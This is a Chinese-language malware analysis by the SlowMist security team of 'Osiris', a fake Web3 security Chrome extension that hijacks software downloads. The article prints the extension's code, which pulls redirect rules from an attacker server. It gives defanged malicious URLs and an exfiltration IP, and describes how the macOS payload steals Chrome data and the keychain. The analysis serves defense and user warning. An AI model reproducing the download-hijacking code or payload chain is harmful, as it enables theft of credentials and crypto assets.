挂羊头卖狗肉 —— Osiris 恶意浏览器扩展分析
2025-05-28 20:06
慢雾科技
2025-05-28 20:06
订阅此专栏
收藏此文章

作者:Thinking

编辑:Liz 


背景


今日,社交平台 X 上的用户 @0xmaoning 联系慢雾安全团队寻求帮助,表示发现浏览器扩展“Osiris”存在钓鱼嫌疑,隐蔽性极强,自己差点中招,希望我们协助分析以避免更多人受害。


经过慢雾安全团队的深入分析,该恶意浏览器扩展会替换用户正常的下载链接,重定向到恶意程序的下载链接,用户不知不觉下载安装了恶意程序,导致加密资产的损失。在此,特别感谢 X 用户 @0xmaoning 和 @Onefly_eth 提供的线索与反馈,为本次分析提供了关键支持,有效避免更多用户落入陷阱。



相关攻击信息


恶意浏览器扩展下载地址: 

https[:]//chromewebstore.google.com/detail/osiris/leegjgppccbgnajpjgijlhplefgpnmdf


恶意程序下载地址:

https[:]//osiris.vip/registrartionusersuccessfully.php?type=dmg


恶意站点:

https[:]//osiris.vip/


恶意程序上传数据:

http[:]//192.124.178.88


钓鱼技巧分析


攻击者通过社交平台推荐目标用户下载恶意浏览器扩展“Osiris”,该扩展伪装成 Web3 安全工具,美其名曰帮助用户识别 Web3 欺诈,钓鱼,恶意程序等,实则心怀不轨。


 

恶意浏览器扩展下载地址(风险提醒:注意要在隔离的环境中分析):https[:]//chromewebstore.google.com/detail/osiris/leegjgppccbgnajpjgijlhplefgpnmdf。


我们分析恶意浏览器扩展的代码,发现该扩展通过“chrome.declarativeNetRequest.updateDynamicRules”的方式设置网络请求的规则。


代码内容如下所示:


function fetchDynamicRules() {  chrome.storage.local.get("uid"data => {    const uid = data.uid ? data.uid : "";    const uidParam = uid ? `?uid=${uid}` : "";    fetch(`${BASE_URL}/security${uidParam}`)      .then(response => response.json())      .then(rules => {        if (!rules || !Array.isArray(rules)) {          console.warn("Rules incorrect.");          return;        }        const ruleIds = rules.map(rule => rule.id);        chrome.declarativeNetRequest.updateDynamicRules({          removeRuleIds: ruleIds,          addRules: rules        }, () => {          console.log("Rules updated", rules);        });      })      .catch(err => console.error("Error fetching rules:", err));  });}

网络请求的规则是从攻击者控制的服务器上获取的。


规则获取的请求:https[:]//osiris.vip/security?uid=aauyaxxsyd。



获取并添加规则到“chrome.declarativeNetRequest.updateDynamicRules”后,目标用户后续的网络请求如果匹配到了规则就会被替换。


攻击者设置的规则是:


  • 匹配所有以 .exe,dmg,zip 结尾的 URL;

  • 仅针对网页主框架(地址栏 URL)或子框架 (iframe) 的请求;

  • 替换成恶意程序下载链接。

 


有关 declarativeNetRequest 的介绍可以参考:https://developer.chrome.com/docs/extensions/reference/api/declarativeNetRequest。


 

因此,在目标用户安装完恶意扩展后,攻击者还会引导用户去某些应用程序的官网(如:Notion 的官网)下载应用程序,从而触发下载链接替换的陷阱。触发后,虽然浏览器中的下载记录显示的是应用程序官方的来源,但是下载的程序已经被替换成恶意程序了,攻击者巧妙地利用了浏览器展示上的缺陷对用户进行欺骗。



恶意程序分析


我们以 macOS 版本的恶意程序为例进行分析。


恶意程序下载地址(风险提醒:注意要在隔离的环境中进行分析):https[:]//osiris.vip/registrartionusersuccessfully.php?type=dmg。


恶意程序被打开后会引导用户打开终端,并将 Installer 拖到终端中运行。



用户实则是将 Installer.kmo 放到了终端中运行。Installer.kmo 使用了 base64 编码隐藏攻击者的代码意图,同时要求用户输入电脑密码以获取权限,从而读取敏感数据。

 


 

解码后发现是使用 bash 运行了一段 AppleScript 脚本。该 AppleScript 是为了运行 .Installer:


1. 查找目标磁盘,通过 AppleScript 列出所有挂载的磁盘,找到名称包含 Installer 的磁盘;

2. 复制隐藏安装程序,将该磁盘中的隐藏文件 .Installer 复制到 /tmp 目录,并赋予执行权限;

3. 静默执行,直接运行复制的安装程序,过程中通过 try 块抑制错误,无任何验证或用户交互。

 


运行 .Installer 后,会将用户的 Chrome 浏览器数据和 keychain 等数据进行打包,然后上传到 192.124.178.88。攻击者拿到这些数据后可以尝试解码获取 Web3 钱包的私钥或助记词,从而盗取用户的资产,也可以获取用户 Chrome 中保存的账号密码,进而接管用户的社交平台账号、加密货币平台账号等。




类似的攻击手法我们此前已分析过,感兴趣的读者见眼见不为实|假 Zoom 会议钓鱼分析


总结


真安全无需过度承诺,伪工具终难掩饰杀机。Web3 世界机遇与风险并存,以“安全”为名的解决方案或者工具推荐,也可能成为被攻击者利用的用户心理突破口。这类伪装成“安全工具”的扩展程序通过劫持下载链接、植入恶意代码等手段窃取加密资产和用户数据,已有用户蒙受损失。鉴于此,慢雾安全团队提醒广大用户避免安装不知名的程序,扩展等,也不要轻信陌生人的方案或者工具推荐。此外,建议用户通过安装知名杀毒软件,进一步加强端上的安全防御。


往期回顾

慢雾:Cetus 被盗 2.3 亿美金事件分析

黑暗森林里的“客服”:社工骗局盯上 Coinbase 用户

MistTrack MCP 上线,开启链上追踪与风险分析的 AI 新范式

慢雾:《Solana 智能合约安全最佳实践》全面更新

MistTrack:跨链协议分析系列之 Bitget Swap

慢雾导航


慢雾科技官网

https://www.slowmist.com/


慢雾区官网

https://slowmist.io/


慢雾 GitHub

https://github.com/slowmist


Telegram

https://t.me/slowmistteam


Twitter

https://twitter.com/@slowmist_team


Medium

https://medium.com/@slowmist


知识星球

https://t.zsxq.com/Q3zNvvF

【免责声明】市场有风险,投资需谨慎。本文不构成投资建议,用户应考虑本文中的任何意见、观点或结论是否符合其特定状况。据此投资,责任自负。

慢雾科技
数据请求中
查看更多

推荐专栏

数据请求中
在 App 打开